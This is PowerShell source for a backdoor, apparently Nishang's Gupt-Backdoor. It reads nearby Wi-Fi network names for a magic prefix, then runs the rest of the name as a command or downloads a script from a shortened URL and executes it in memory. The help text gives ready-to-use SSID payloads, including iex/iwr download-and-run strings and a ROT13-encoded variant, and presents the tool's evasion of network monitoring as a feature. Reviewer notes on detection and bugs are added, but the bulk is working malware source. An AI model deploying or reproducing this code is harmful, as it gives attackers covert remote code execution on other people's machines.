function Gupt-Backdoor
{
<#
.SYNOPSIS
Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
.DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from the list of all available networks. It matches the first four characters of
each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', the rest of the SSID name is considered to be a command and
executed. If the 5th character is a 'u', the rest of the SSID is considered the id part of a Google URL Shortener link and a script is downloaded and
executed in memory from the URL. See examples for usage.
Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
.PARAMETER MagicString
The string which Gupt would compare with the available SSIDs.
.PARAMETER Arguments
Arguments to pass to a downloaded script.
.PARAMETER EncodedCmd
Use this switch if the command part of the SSID name is ROT13 encoded.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute a PowerShell script on the target, the wireless network name should be
"op3nunJEuug". Here, Gupt will use the characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
by the Google shortener would be downloaded and executed.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". For PowerShell v3 and onwards, to execute a script on the target, just set the SSID
name to "op3nciex(iwr_bit.ly/2g6JbQB)" and the script will be downloaded and executed in memory on the target.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose -EncodedCmd
In above, Gupt will look for an SSID starting with "op3n" and the rest of the command encoded with ROT13.
ConvertTo-ROT13 from Nishang can be used for encoding a command.
For PowerShell v3 and onwards, to execute a script on the target, just set the SSID
name to "op3ncvrk(vje_ovg.yl/2t6WoDO)" and the script will be downloaded and executed in memory on the target.
.NOTES
Behaviour that is visible in the code below (relevant when reviewing this sample or building detections for it):
- It polls "netsh wlan show network" in an endless loop, sleeping 5 seconds between sweeps and 10 seconds after each executed instruction.
  The wireless scan output, not a network connection, is the entire command channel.
- The SSID check compares the first four characters of the SSID against only the first THREE characters of MagicString, using -match
  (a regular-expression, case-insensitive comparison), not a literal equality test. The description above says four characters.
- The 'u' path fetches with System.Net.WebClient.DownloadString and hands the returned text straight to Invoke-Expression; the 'c' path hands
  the SSID text itself to Invoke-Expression. No file is written in either path. The goo.gl shortener has since been retired, so the 'u' path
  is unlikely to resolve anymore.
- Observable points for a defender: netsh.exe repeatedly spawned from a PowerShell host, a WebClient download immediately followed by
  Invoke-Expression, and Invoke-Expression of strings that originate outside the script.
.LINK
http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position=0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position=1, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position=2, Mandatory = $False)]
[Switch]
$EncodedCmd
)
#ROT13 code From learningpcs.blogspot.com/2012/06/powershell-v2-function-convertfrom.html
# Nested helper. ROT13 is its own inverse, so this one function both encodes and decodes:
# a-m / A-M are shifted forward by 13, n-z / N-Z backward by 13, and every other character is copied through unchanged.
# Returns the transformed text as a single string on the pipeline.
function ConvertTo-ROT13
{
param(
[Parameter(Mandatory = $False)]
[String]
$rot13string
)
[String] $string = $null;
$rot13string.ToCharArray() | ForEach-Object {
if((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77)))
{
# 97..109 is 'a'..'m', 65..77 is 'A'..'M': first half of the alphabet moves forward.
$string += [char] ([int] $_ + 13);
}
elseif((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90)))
{
# 110..122 is 'n'..'z', 78..90 is 'N'..'Z': second half of the alphabet moves backward.
$string += [char] ([int] $_ - 13);
}
else
{
# Digits, punctuation and anything non-ASCII-letter pass through untouched.
$string += $_
}
}
$string
}
#Get list of available Wlan networks
# Endless poll loop. The only exit path is the "exit" instruction handled further down (see the note there).
while($True)
{
Write-Verbose "Checking wireless networks for instructions."
# Spawns netsh.exe and captures its text output; this scan output is the whole input to the backdoor.
$networks = Invoke-Expression "netsh wlan show network"
# Keep only output lines mentioning SSID, then strip everything up to the last ':' and remove every space.
# Because '.*:' is greedy, an SSID that itself contains ':' is truncated at that colon; removing spaces is why
# the 'c' path below translates '_' back to ' '.
$ssid = $networks | Select-String "SSID"
$NetworkNames = $ssid -replace ".*:" -replace " "
ForEach ($network in $NetworkNames)
{
#Check if the first four characters of our SSID matches the given MagicString
# NOTE: only the first 3 characters of MagicString are used, and -match treats them as a regular expression
# (case-insensitive by default), so this is looser than the literal four-character prefix the help describes.
# A MagicString shorter than 3 characters makes Substring throw here.
if ($network.ToString().Length -gt 4 -and $network.Substring(0,4) -match $MagicString.Substring(0,3))
{
Write-Verbose "Found a network with instructions!"
#If the network SSID contains fifth character "u", it means rest of the SSID is a URL
# The 5th character selects the mode: 'u' = download-and-run, 'c' = inline command.
if ($network.Substring(4)[0] -eq "u")
{
$PayloadURL = "http://goo.gl/" + $network.Substring(5)
Write-Verbose "Downloading the attack script at $PayloadURL and executing it in memory."
# Remote text is evaluated directly in this process; nothing is written to disk in this code.
$webclient = New-Object System.Net.WebClient
Invoke-Expression $webclient.DownloadString($PayloadURL)
if ($Arguments)
{
# -Arguments is itself evaluated as PowerShell, not passed as parameters to the downloaded script.
Invoke-Expression $Arguments
}
Start-Sleep -Seconds 10
}
elseif ($network.Substring(4)[0] -eq "c")
{
if ($EncodedCmd -eq $True)
{
# ROT13 is symmetric, so the "encode" helper also decodes.
$cmd = ConvertTo-ROT13 -rot13string $network.Substring(5)
}
else
{
$cmd = $network.Substring(5)
}
if ($cmd -eq "exit")
{
# 'break' leaves the innermost loop, which is this ForEach rather than the outer while, so the poll
# loop appears to resume after the 5-second sleep below — TODO confirm; the help implies a full stop.
break
}
if ($PSVersionTable.PSVersion.Major -ge 3)
{
# NOTE: this message mentions $PayloadURL, which is only assigned in the 'u' branch above; in this
# branch it is empty or left over from an earlier iteration, so the verbose text is misleading.
Write-Verbose "PowerShell v3 or above in use. Downloading the attack script at $PayloadURL and executing it in memory."
# Spaces were stripped from the SSID earlier, so '_' is the stand-in for a space in the command.
Invoke-Expression ($cmd -replace '_',' ')
Start-Sleep -Seconds 10
}
else
{
# Pre-v3 path: the command is evaluated verbatim, without the '_' -> ' ' translation.
Write-Verbose "Command `"$cmd`" found. Executing it."
Invoke-Expression $cmd
Start-Sleep -Seconds 10
}
}
}
}
# Interval between wireless scans.
Start-Sleep -Seconds 5
}
}